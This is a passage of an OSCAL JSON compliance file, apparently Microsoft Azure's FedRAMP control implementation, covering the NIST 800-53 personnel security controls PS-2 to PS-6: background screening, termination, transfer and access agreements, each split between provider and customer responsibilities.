statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d12bf455-1b5a-4118-aa3d-4f04653a648a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-2_smt.c","by-components":[{"uuid":"54a132f1-4b98-4518-a358-a192b86a04fd","export":{"provided":[{"uuid":"7f05e92f-0ae2-4270-af03-8d2155a64188","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-008"}],"description":"Microsoft reviews the position risk designations as part of the annual Personnel Screening SOP update. All positions are subject to screening requirements._x000D_ _x000D_"}],"responsibilities":[{"uuid":"aa688ab6-ef77-4cde-8706-964d3437d7d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-008"}],"description":"The customer is responsible for reviewing and updating risk designations on a customer-defined frequency.","provided-uuid":"7f05e92f-0ae2-4270-af03-8d2155a64188"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"58fd85d7-aee7-491d-958c-ea6f7c698c4a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-3","statements":[{"uuid":"0faa577f-5160-447b-9d09-cefeacf8729a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-3_smt.a","by-components":[{"uuid":"5dc6b1bd-1a93-4908-ba43-31cbefaf60a3","export":{"provided":[{"uuid":"5fc6d483-125e-40cf-bdac-4e845fd2e637","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-009"}],"description":"The Microsoft Security department conducts background checks and enforces the screening policies for all personnel. Background checks in the form of the Microsoft Cloud Screen are required for new hires or personnel transferring to positions that involve access to customers' work sites and/or sensitive areas, including access to customer PII. The Microsoft Cloud Screen includes the following:_x000D_ _x000D_ * Employment history check for the previous seven years_x000D_ * Education Check (highest degree obtained)_x000D_ * Social Security Number (SSN) Check_x000D_ * Criminal History Check for the previous seven years_x000D_ * Office of Foreign Assets Control List (OFAC) Check_x000D_ * Bureau of Industry and Security List (BIS) Check_x000D_ * Office of Defense Trade Controls Debarred Persons List Check_x000D_ _x000D_ Vendor staff with access to customer data are required to sign a background screening addendum with Microsoft. Microsoft managers are required to include screening verbiage in their respective SOWs with vendors._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9f801ca0-afc0-4cbd-bfdf-0241dedfbcca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-009"}],"description":"The customer is responsible for screening individuals prior to authorizing access to customer-deployed resources.","provided-uuid":"5fc6d483-125e-40cf-bdac-4e845fd2e637"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c9dc2f68-fb71-40df-91e0-b45fb92ed0e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-3_smt.b","by-components":[{"uuid":"6ade4a84-c6fd-47ad-9dce-325315651090","export":{"provided":[{"uuid":"4e0ae601-5b42-46d2-8c3e-e255d1e187da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-010"}],"description":"This control is not applicable. Background investigation requirements for Azure for FedRAMP are only at the Minimum Background Investigation level, and there are no reinvestigation requirements for moderate and low public trust positions._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f714babe-35b4-46cd-b586-68eaa341058c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-010"}],"description":"The customer is responsible for rescreening individuals at a customer-defined frequency or under customer-defined conditions.","provided-uuid":"4e0ae601-5b42-46d2-8c3e-e255d1e187da"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"232bb7b2-ac7e-444a-b8c2-3f9818fc462f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-3.3","statements":[{"uuid":"8a8d26cd-7a52-4a82-9d75-08b6e91e2c59","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-3.3_smt.a","by-components":[{"uuid":"a480c7fb-267f-4243-97b5-bb662f087755","export":{"provided":[{"uuid":"1cb1c295-4e71-400c-a276-fdf4a4970526","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-011"}],"description":"Azure personnel are required to satisfy the screening requirements._x000D_ _x000D_"}],"responsibilities":[{"uuid":"58d244cc-4bbc-435d-bbf6-e6c1fde2a7a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-011"}],"description":"The customer is responsible for controlling access to protected information by ensuring that individuals accessing customer-deployed resources which process, store, or transmit information requiring special protection have been assigned official government duties that demonstrate valid access authorizations.","provided-uuid":"1cb1c295-4e71-400c-a276-fdf4a4970526"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6c0d1faf-5ead-4c89-8f95-8000f108a6c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-012"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-3.3_smt.b","by-components":[{"uuid":"b640f8b0-8717-4f8b-84cd-7e6e46550e92","export":{"provided":[{"uuid":"cd8c5c44-6832-4b6e-829c-981d299f0044","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-012"}],"description":"Azure personnel are required to satisfy the screening requirements._x000D_ _x000D_"}],"responsibilities":[{"uuid":"60dbde22-62cf-4881-b501-c4394341ab45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-012"}],"description":"The customer is responsible for controlling access to protected information by ensuring that individuals accessing customer-deployed resources which process, store, or transmit information requiring special protection, satisfy any additional customer-defined personnel screening criteria.","provided-uuid":"cd8c5c44-6832-4b6e-829c-981d299f0044"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1c67563f-ecd3-4b17-ba9b-42206176a970","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-4","statements":[{"uuid":"28133975-0398-427a-8407-f8bf79a22249","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-013"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.a","by-components":[{"uuid":"10cd3eb2-54dc-4973-bc89-c94ed36de06e","export":{"provided":[{"uuid":"01888535-7cc1-494b-9d61-beb26da1e92d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-013"}],"description":"Microsoft HR and Azure management ensure personnel termination is handled appropriately. For voluntary terminations, on the last day of employment, the individual is terminated from the HR system via a Termination Transaction ticket entered in the Employee/Manager Self Service Tool by the employee, manager, group administrator, or equivalent personnel with work-on-behalf privileges. For involuntary terminations, the request is submitted by the aligned HR Employee Relations Manager to the Central HR Operations team for processing._x000D_ _x000D_ Once entered, voluntary termination requests are approved by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. Once the transaction has been entered and approved, Microsoft Accounts and Security teams are notified and access to information systems is disabled. Human Resources is also notified of the termination request. For voluntary terminations, access is disabled on the last day of employment, barring any special considerations such as security concerns or if the employee is leaving for a competitor. For involuntary terminations, an urgent request for access termination is submitted via email from HR and access is disabled within four (4) hours._x000D_ _x000D_ Terminations are communicated to personnel required to remove information system and physical access to facilities via the Manager Self-Service termination transaction process and/or urgent terminations email template. The supervisor or/and Business Administrators are responsible for ensuring that all local access to Azure physical components is removed._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f2584a5c-ef93-4b77-bd69-c3d6c3189ed5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-013"}],"description":"The customer is responsible for appropriately terminating customer personnel within a customer-defined time period.","provided-uuid":"01888535-7cc1-494b-9d61-beb26da1e92d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d2fde38b-31db-4fc5-80c1-9bcd3944d789","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.b","by-components":[{"uuid":"83ccf628-943d-4466-8375-2c74483bef8c","export":{"provided":[{"uuid":"6429a4c0-381a-44a9-bf8b-fa0d7177a0e6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-014"}],"description":"When an individual is terminated via voluntary termination, he or she is removed from the Human Resources Information System (HRIS) via a Termination Transaction approved by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. If an individual is involuntarily terminated, the request is submitted by the central HR Operations team via a request from the org-aligned HR Manager. When an individual is marked as terminated in HRIS, this information propagates to Active Directory, which then automatically removes/revokes any authenticators/credentials associated with the individual._x000D_ _x000D_"}],"responsibilities":[{"uuid":"feb1c5b4-d014-49d4-b1f4-012e1a34fa34","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-014"}],"description":"The customer is responsible for the appropriate revocation of authenticators/credentials associated with terminated customer personnel.","provided-uuid":"6429a4c0-381a-44a9-bf8b-fa0d7177a0e6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3e4de456-f6bb-466b-8b52-af9151a40cd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.c","by-components":[{"uuid":"d4f54d6f-b25d-4ef3-889b-c8c28b42197b","export":{"provided":[{"uuid":"b5fc0f6e-121b-4844-a08f-31b12f3e6046","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-015"}],"description":"Microsoft sends an exit survey personnel being hired by a competitor on or before the user's last day at Microsoft. Topics covered in the exit survey include review of non-disclosure provisions. Exit survey may not be conducted in the event of a termination where the individual is not going to a competitor._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e580ceb0-6cc9-497c-be45-62b00429ab8a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-015"}],"description":"The customer is responsible for conducting exit interviews which include customer-defined information security topics upon termination of customer personnel.","provided-uuid":"b5fc0f6e-121b-4844-a08f-31b12f3e6046"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"60da7335-ed01-4869-b022-9b67955f025d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.d","by-components":[{"uuid":"d3d87d2a-0d94-4579-8540-88e5741b4a9c","export":{"provided":[{"uuid":"8a0a11c2-dfa6-4827-a133-43ae2004e213","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-016"}],"description":"Upon termination, building access badges, logical access badges, computer/hardware, and vehicle authorization tags are collected. Access to the work location, office, or station is denied or supervised to allow the individual to gather personal belongings prior to being escorted out of the building. These processes ensure that Microsoft collects all security-related, organizational information system-related property prior to the terminated individual's departure._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c19ad1b7-3338-41ba-a4e4-e1c999deba7e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-016"}],"description":"The customer is responsible for retrieving all security- and system-related property upon termination of customer personnel.","provided-uuid":"8a0a11c2-dfa6-4827-a133-43ae2004e213"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"024407b1-09f1-4207-8c7b-da37ef7fb78f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-017"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.e","by-components":[{"uuid":"0f34bce0-ff97-459f-b3d9-27f4e0d03dbe","export":{"provided":[{"uuid":"45224965-0461-41c7-b18c-cf39237e4426","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-017"}],"description":"Microsoft retains information formerly controlled by terminated individual on file servers and SQL/SharePoint as part of the Data Protection Services' (DPS) disaster recovery retention for ninety (90) days. Additionally, managers can also gain access to workstations{{RX accounts}} of terminated personnel after HR has approved the requested access._x000D_ _x000D_"}],"responsibilities":[{"uuid":"b087cb7b-b5ff-4589-8f00-b81013c8f5f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-017"}],"description":"The customer is responsible for retaining access to resources formally controlled by terminated customer personnel.","provided-uuid":"45224965-0461-41c7-b18c-cf39237e4426"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4485a5e8-4174-4887-ad62-a6faaa8dd61f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-4.2","statements":[{"uuid":"41f2793c-0b82-4309-9479-439dd694f64d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-018"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4.2_smt","by-components":[{"uuid":"b8da16c9-ff6f-43e8-bf59-7e7b0bb34c5a","export":{"provided":[{"uuid":"3494a490-2e55-4fff-a7c3-607285bee34e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-018"}],"description":"Microsoft Human Resources (HR) and the individual's manager ensure personnel termination is handled appropriately. The individual is terminated from the HR system via a Termination Transaction ticket entered in the Manager Self Service Tool and approved by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. Once the transaction has been entered and approved, Microsoft Accounts and Security teams are notified and access to information systems and physical locations is disabled._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0e1dfe62-987d-48eb-b713-af2104dad4f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-018"}],"description":"The customer is responsible for employing automated mechanisms to notify customer-defined personnel/roles upon termination of a customer employee.","provided-uuid":"3494a490-2e55-4fff-a7c3-607285bee34e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bb3e73b0-3890-4626-8158-aab75b2d2e92","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-5","statements":[{"uuid":"3594c57f-74ff-4fcc-ba81-980d89b38564","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-019"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-5_smt.a","by-components":[{"uuid":"84e48a82-68c0-4393-9b08-596584a7b85c","export":{"provided":[{"uuid":"b7462574-c42b-4522-8c8d-88a77302df6a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-019"}],"description":"Microsoft HR ensures personnel transfer is handled appropriately. Microsoft implements personnel transfer using the Manager Self Service Tool, which is managed by Microsoft Headcount Operations. When personnel transfer to new positions with new reporting structures, a Manager Self Service Tool transfer transaction is keyed into the HR system by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. Once the transfer has populated in the downstream tools and applications, access to data is reassigned based on the new role and scope within twenty-four (24) hours of transfer._x000D_ _x000D_ Access to buildings, rooms, and websites can be requested by the transferred individual's manager._x000D_ _x000D_"}],"responsibilities":[{"uuid":"16adc4a0-9ae0-466e-8fdb-d89b870688e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-019"}],"description":"The customer is responsible for appropriately transferring personnel and reviewing current logical and physical access authorizations to customer-deployed resources/facilities when individuals are reassigned or transferred.","provided-uuid":"b7462574-c42b-4522-8c8d-88a77302df6a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"30bc5c4f-3ee2-4ff9-b38e-ccaf1dee98cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-5_smt.b","by-components":[{"uuid":"4a746b90-614a-4ea7-be1b-3cc09d046104","export":{"provided":[{"uuid":"761891c9-8b98-4789-bf30-a2fdd4331781","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-020"}],"description":"Azure ensures account management activities associated with personnel transfer is initiated within twenty-four (24) hours of submission for personnel who are reassigned or transferred to other positions within the organization._x000D_ _x000D_"}],"responsibilities":[{"uuid":"b5b720c9-4db4-4739-85b4-f598925eec05","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-020"}],"description":"The customer is responsible for performing customer-defined actions that must be taken within a defined time period following formal transfer/reassignment of customer personnel.","provided-uuid":"761891c9-8b98-4789-bf30-a2fdd4331781"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"aca3d4e2-947f-4c81-8de6-c133ace7cde3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-021"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-5_smt.c","by-components":[{"uuid":"967f4603-f5d7-400a-adf0-af0bb2596a68","export":{"provided":[{"uuid":"ee7bee27-6c63-4b19-a337-85e5d7da165d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-021"}],"description":"Microsoft HR ensures personnel transfer is handled appropriately. Microsoft implements personnel transfer using the Manager Self Service Tool, which is managed by Microsoft Headcount Operations. When personnel transfer to new positions with new reporting structures, the Manager Self Service Tool transfer transaction is keyed into the HR system by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. Once the transfer has populated in the downstream tools and applications, access to data is reassigned based on the new role and scope within twenty-four (24) hours of transfer._x000D_ _x000D_ Access to buildings/rooms/websites can be requested by the transferred individual's manager._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9703da34-ed34-4978-8255-59c9877e8981","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-021"}],"description":"The customer is responsible for modifying access authorizations of transferred/reassigned customer personnel as a result of the review performed in PS-05.a.","provided-uuid":"ee7bee27-6c63-4b19-a337-85e5d7da165d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ce576153-be47-406f-a559-2211bfdbef4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-022"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-5_smt.d","by-components":[{"uuid":"064deecc-a238-400b-914b-2c2b907ea404","export":{"provided":[{"uuid":"b82fa148-6b97-4d9e-b3d6-cf05cb0e40b0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-022"}],"description":"Microsoft Managers of employees are responsible for ensuring personnel transfer is initiated within twenty-four (24) hours for personnel who are reassigned or transferred to other positions within the organization in the Employee Central system. Subsequently, the new managers of employees are responsible to approve the initiated request in the Employee Central system. Microsoft defines the transfer or reassignment actions to implement using the Employee Central system, which is managed by Microsoft Human Resources. When an individual transfers to a position within a different cost center, an Employee Central transfer transaction is keyed into system by HR Operations._x000D_ _x000D_"}],"responsibilities":[{"uuid":"bf3d1b32-0ed8-45af-ab9e-ba87feab3891","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-022"}],"description":"The customer is responsible for notifying customer-defined personnel/roles within a customer-defined time period following customer personnel transfer/ reassignment.","provided-uuid":"b82fa148-6b97-4d9e-b3d6-cf05cb0e40b0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1ee8febe-898e-4821-99db-1ff5bf5914ec","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-6","statements":[{"uuid":"8db79a56-51da-4c56-922b-4d5b82de4994","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-6_smt.a","by-components":[{"uuid":"110e1293-f6b2-4e79-b978-720de90cdac7","export":{"provided":[{"uuid":"08d4544c-2824-4b44-8cf6-b424583cc3b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-023"}],"description":"Microsoft has developed and documented confidentiality and non-disclosure provisions for personnel requiring access to Azure in various roles._x000D_ _x000D_ Before gaining access to information systems, Microsoft full time employees (FTEs) must sign the Employee Agreement (EA) which includes non-disclosure provisions and statements regarding information and asset protection responsibilities. This document also describes the penalties for the violation of these responsibilities. The annual fulfillment of the Security Foundations training course is signed by the employee and meets the requirements for the rules of behavior and access agreements. At the end of the Security Foundations course, the employee must check a box acknowledging that the employee has access to the Microsoft Policy and that the employee will abide by those policies._x000D_ _x000D_ Third parties, such as subcontractors and vendors, must complete the Resource Access Agreements (RAA), the Email/Network & Cardkey Access Agreement (ECA), and the Contract Worker Agreement (CWA) that also includes non-disclosure provisions for Agency Temporary Workers (ATW). These documents are a part of the Master Supplier Services Agreement (MSSA)._x000D_ _x000D_ In addition, all Microsoft employees are required to sign paperwork acknowledging security training provided during the new hire orientation process. During this training, descriptions are given as to the responsibilities and expected behavior regarding information and information system usage. It is also communicated that security responsibilities extend outside of the work site and beyond the standard operating hours of their employment and continues for a defined period after employment ends. It is the duty of Microsoft personnel to be in compliance with regulatory mandates._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8090c7bc-6044-474f-ae5f-3a10a203e0ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-023"}],"description":"The customer is responsible for developing and documenting access agreements for customer-deployed resources.","provided-uuid":"08d4544c-2824-4b44-8cf6-b424583cc3b2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3da99346-4509-49aa-98c6-b3c2394f6b09","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-6_smt.b","by-components":[{"uuid":"4e628acb-f642-48ba-b320-94aeaf7b12cb","export":{"provided":[{"uuid":"bb53b3e2-bd5d-449c-90f0-75a473b8d1f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-024"}],"description":"The Employee Agreement, RAA, ECA, and CWA, as well as other contractual documents signed as part of the new hire orientation process, are reviewed annually to reflect changes in the Microsoft environment, and updated as needed._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f9300da8-2de9-41bb-958f-405af540eaa8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-024"}],"description":"The customer is responsible for reviewing and updating access agreements at a customer-defined frequency.","provided-uuid":"bb53b3e2-bd5d-449c-90f0-75a473b8d1f0"}]},"description":"See inheritance and customer responsibility 